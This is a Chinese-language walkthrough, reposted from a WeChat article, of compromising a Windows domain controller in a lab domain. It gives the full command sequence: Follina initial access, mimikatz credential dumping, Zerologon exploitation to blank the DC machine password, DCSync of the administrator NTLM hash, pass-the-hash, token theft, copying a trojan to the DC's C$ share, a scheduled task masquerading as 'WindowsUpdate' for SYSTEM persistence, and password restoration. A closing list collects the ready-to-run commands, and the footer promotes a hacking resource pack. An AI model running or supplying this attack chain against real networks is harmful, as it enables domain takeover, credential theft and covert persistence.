环境:win10,winserver2016
目标:拿下域控
策略:
1、获得初始访问权限
2、抓密码(如成功直接跳步骤6)
3、侦察域控
4、zerologon漏洞检测、利用
5、dcsync读取管理员哈希
6、pth横向移动
7、上传木马至域控
8、设置计划任务上线域控
9、zerologon还原
一、获得初始访问权限
我们通过follina漏洞配合免杀打中了一台win10,获得了初始访问权限,并提升为system权限。
二、抓密码
接下来我们尝试使用mimikatz抓取密码,搜刮一顿密码,结果发现除了本机之外并没有其他密码。
三、侦察域控
接下来我们发现该主机在域内,通过ping和net命令获取了域控ip地址和主机名。
四、zerologon漏洞检测、利用
接下来我们将尝试测试域控的漏洞,用的最多的是zerologon漏洞,顾名思义,该漏洞分为zero和logon两部分构成,意思就是将密码置空,然后登陆。该漏洞通杀未打补丁的server2008到2019,目前已经集成到cobaltstrike的mimikatz中。
发现回显* Authentication: OK – vulnerable,表示存在漏洞,接下来我们进行漏洞利用。
发现回显* Set password : OK – may be unstable,这代表利用成功。我们成功将域控机器账号WIN-DOBHQK3TVES$置空。
五、dcsync读取管理员哈希
一旦置空,则可以登录域控,但我们还不能直接登录,因为我们置空的不是administrator,接下来,我们使用minikatz通过机器账户ntml登录域控并读取域控管理员hash,这将是一条命令完成。
此时回显Hash NTLM: 579da618cfbfa85247acf1f800a280a4,这代表成功读取了了administrator的hash值,那么接下来我们将使用该hash值横向移动登录至域控。
六、pth横向移动
接下来使用获取到的administrator账户hash开始横向登录域控。
回显pid 7628,代表开辟了一个会话,接下来使用steal_token命令窃取令牌,提示已冒充
08/06 17:57:26 beacon> steal_token 1700``08/06 17:57:27 [*] Tasked beacon to steal token from PID 1700``08/06 17:58:38 [+] host called home, sent: 12 bytes``08/06 17:58:56 [+] Impersonated PENTEST\user1
七、上传木马至域控
窃取令牌后,代表我们与域控已经打通,我们将上传一个木马进域控c盘。
八、设置计划任务上线域控
提示已复制,那么接下来我们将通过隧道在域控创建一个计划任务,让其自动运行。
此时提示”成功: 成功创建计划任务 “WindowsUpdate”,5分钟后,域控以system权限自动上线。
九、zerologon还原
在域控上线之后,我们必须马上恢复域控的机器账户密码,否则会导致域控脱域,这将是一条命令完成。
mimikatz lsadump::postzerologon /target:192.168.136.129 /account:WIN-DOBHQK3TVES$
执行后回显:Password updated (to Waza1234/Waza1234/Waza1234/) ,此时代表还原成功。渗透结束。
以下是本次演示涉及到的一些命令:
#抓取密码``logonpasswords`` ``#查看域控IP、列表``shell ping pentest.com``shell net group "Domain Controllers" /domain`` ``#使用zerologon漏洞将域控机器密码置空``mimikatz lsadump::zerologon /target:192.168.136.129 /account:WIN-DOBHQK3TVES$ /exploit`` `` ``#使用空机器密码读取管理员哈希``mimikatz lsadump::dcsync /domain:pentest.com /dc:WIN-DOBHQK3TVES /User:Administrator /authuser:WIN-DOBHQK3TVES$ /authdomain:pentest /authpassword:"" /authntlm`` `` ``#使用管理员哈希pth横向移动``mimikatz sekurlsa::pth /user:administrator /domain:pentest /ntlm:579da618cfbfa85247acf1f800a280a4 /run:"cmd -w hidden"`` ``#窃取令牌并上传木马至域``steal_token <pid>``shell copy C:\Users\user1\Desktop\processinject.exe \\192.168.136.129\c$`` `` ``#设置计划任务``shell schtasks /create /s 192.168.136.129 /tn WindowsUpdate /sc minute /mo 5 /tr C:\processinject.exe /ru system /f`` ``#使用zerologon漏洞还原机器密码``mimikatz lsadump::postzerologon /target:192.168.136.129 /account:WIN-DOBHQK3TVES$
本文转自 https://mp.weixin.qq.com/s/HwbR8DcWgmgpCGk5Us0YDA,如有侵权,请联系删除。
为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
[2024最新CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
[2024最新CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]